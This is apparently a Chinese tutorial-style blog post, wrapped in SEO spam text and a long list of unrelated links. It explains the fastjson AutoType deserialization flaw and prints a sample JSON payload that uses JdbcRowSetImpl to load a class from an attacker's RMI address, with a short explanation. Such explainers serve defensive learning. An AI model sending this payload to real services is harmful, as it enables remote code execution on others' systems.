当前位置: 首页 > wzjs >正文

数字营销技术应用网站电商平台运营

数字营销技术应用网站,电商平台运营,乐陵市最新疫情,南昌做网站开发的公司有哪些fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用type标记字符的原始类型&#x…

fastjson漏洞

  • fastjson工作原理
  • 攻击原理
    • 补充
  • 例子

fastjson工作原理

fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用==@type==标记字符的原始类型,在反序列话时会读取@type以此把内容反序列化到对象,在上述过程中会调用到库中的setter和getter方法

攻击原理

攻击者传入一个恶意构造的json内容,程序对其反序列话后得到恶意类并执行了恶意类中的恶意函数,进而促使恶意代码执行
合理构造一个JSON使用@type指定一个想要攻击的类库就可以实现攻击

补充

仅影响Fastjson1.2.24及之前版本

例子


{"b": {"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "rmi://攻击者的IP地址/恶意类","autoCommit": true}
  • JSON 数据包:这里展示的 JSON 数据包包含一个名为 b 的对象,其中有一个 @type 字段,指定了这个对象的类型为
    com.sun.rowset.JdbcRowSetImpl。这是一种 Java 对象类型。
  • 恶意数据:在 dataSourceName 字段中,提供了一个远程方法调用 (RMI) 的 URL,指向攻击者的 IP
    地址和他们控制的恶意类。这意味着 Fastjson 会尝试从这个远程地址加载并执行恶意类。
  • 自动提交:autoCommit 字段被设置为 true,表明在反序列化后自动执行某些操作。
http://www.dtcms.com/wzjs/385984.html

相关文章:

  • 一个空间可以做多个网站吗新闻头条今日最新消息
  • wordpress 页面开发教程南昌seo服务
  • 建设文库网站网站如何才能被百度收录
  • 农产品网站的品牌建设友情链接的概念
  • 苏州网站开发公司济南兴田德润厉害吗企业管理培训课程网课
  • wordpress缓存无法清除网站seo推广seo教程
  • 网络运维的工作内容北京百度推广优化
  • 网站流量好难做徐州seo排名公司
  • 四川电子有限公司 - 手机网站360营销
  • 郑州网站设计价格福州seo优化
  • 网站标题的选择新东方在线教育平台官网
  • 销售推广方案seo网站推广有哪些
  • 下做图软件在哪个网站下载怎么做网站优化排名
  • 旅游门户网站模板下载竞价托管优化公司
  • 东昌网站建设公司西安百度推广代理商
  • seo关键词排名优化推荐电脑系统优化软件排行榜
  • 中山百度网站推广网站建设运营
  • 上海专业做网站公司电话seo优化关键词分类
  • 建建设网站的seo薪酬如何
  • 如何做网站搜索引擎优化郑州seo排名公司
  • 网站制作中企动力优社群营销的方法和技巧
  • 搭建网站详细步骤资源网站优化排名软件
  • 工程公司简介范文seo托管服务
  • wordpress电影站品牌软文案例
  • 网站标题几个字合适国外免费建站网站
  • 东莞英文网站制作网站页面优化内容包括哪些
  • 做任务挣钱的网站app河北高端网站建设
  • 天津建站国内最新消息新闻
  • 做网站激励语推广方案范例
  • wordpress用什么主机好关键词优化推广公司哪家好